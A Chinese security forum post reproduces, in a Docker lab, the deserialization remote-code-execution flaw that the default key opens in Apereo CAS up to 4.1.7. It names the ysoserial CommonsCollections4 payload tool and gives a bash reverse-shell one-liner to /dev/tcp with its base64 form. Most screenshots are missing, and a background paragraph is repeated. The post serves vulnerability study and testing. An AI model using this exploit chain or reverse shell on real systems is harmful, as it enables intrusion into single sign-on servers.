首页
社区
课程
招聘
[原创]apereo cas4.1反序列化漏洞复现
发表于: 2023-9-4 19:28 2767

[原创]apereo cas4.1反序列化漏洞复现

2023-9-4 19:28
2767

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。影响版本 Apereo CAS <= 4.1.7

实战中sessionkey也不允许从后端发送前端传输
sessionkey不允许出现在响应包和请求包里
反序列化过程中拿到key就能rce

docker search查看镜像可用版本信息:
图片描述
docker pull apereo/cas获取最新镜像,如果你有指定的版本,后面加上冒号版本号即可
命令如下:
图片描述
图片描述

docker ps查看端口信息:
图片描述

攻击机查看靶场环境,靶机IP:8080/cas/login
图片描述
图片描述

漏洞利用参数 登录处 抓包 可看到
图片描述

使用apereo-cas-attack-1.0-SNAPSHOT-all.jar生成加密的ysoserial的序列化对象payload
下载地址:992K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3V1k6m8M7r3g2J5k6h3!0Q4x3X3c8o6b7g2y4Q4x3X3c8m8N6s2c8S2j5$3E0Q4x3V1k6J5k6h3I4W2j5i4y4W2M7#2)9J5c8X3c8G2N6$3&6D9L8$3q4V1i4K6u0r3N6U0q4Q4x3X3f1H3i4K6u0W2x3q4)9J5c8X3q4H3k6i4u0W2L8#2)9J5k6r3y4S2M7#2)9J5k6r3q4@1N6r3q4U0K9#2)9J5k6o6q4Q4x3X3f1H3i4K6u0V1f1@1&6m8f1q4y4t1e0#2c8Q4x3X3c8S2L8r3I4Q4x3X3g2B7j5i4t1`.

要执行的命令 在后边输入 反弹shell需要编码
使用ysoserial的CommonsCollections4生成加密后的Payload:

图片描述

图片描述

docker exec -it xxxxxx bash
图片描述

bash -i >& /dev/tcp/ip/12340 0>&1
base64编码:YmFzaCAtaSA+JiAvZGV2zNS4xMDQvMTIzNDAgMD4mMQ==
遇到的问题:防火墙没给端口放行
图片描述
shell成功
图片描述

Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)应用程序,用于为多个应用程序提供统一的身份认证和授权服务。CAS 提供了以下几个主要的用途:
 
1、单点登录(SSO):Apereo CAS 允许用户在一次认证后访问多个相互信任的应用程序,无需再次输入凭据。用户只需要登录一次,然后就可以自由地访问其他已集成到 CAS 的应用程序。
 
2、身份认证和授权:CAS 提供了强大的身份认证和授权机制,确保只有经过认证和授权的用户才能访问被保护的资源。CAS 支持多种认证方式,包括用户名/密码认证、基于证书的认证、双因素认证等。
 
3、客户端与服务端的集成:Apereo CAS 提供了客户端和服务端的组件,可以轻松地将 CAS 集成到现有的应用程序中。CAS 客户端负责处理用户登录请求,而 CAS 服务端则负责验证用户凭据并发放票据(Ticket),实现单点登录的功能。
 
4、安全性和可扩展性:Apereo CAS 提供了多种安全性措施,如防止重放攻击、会话管理、票据管理等。此外,CAS 还具有高度可扩展性,可以轻松地集成到复杂的身份管理和认证架构中
Apereo CAS(Central Authentication Service)是一个开源的单点登录(SSO)应用程序,用于为多个应用程序提供统一的身份认证和授权服务。CAS 提供了以下几个主要的用途:

[注意]APP应用上架合规检测服务,协助应用顺利上架!

收藏
免费 1
支持
分享
最新回复 (3)
雪    币: 4044
活跃值: (31156)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2023-9-5 10:04
1
游客
登录 | 注册 方可回帖
返回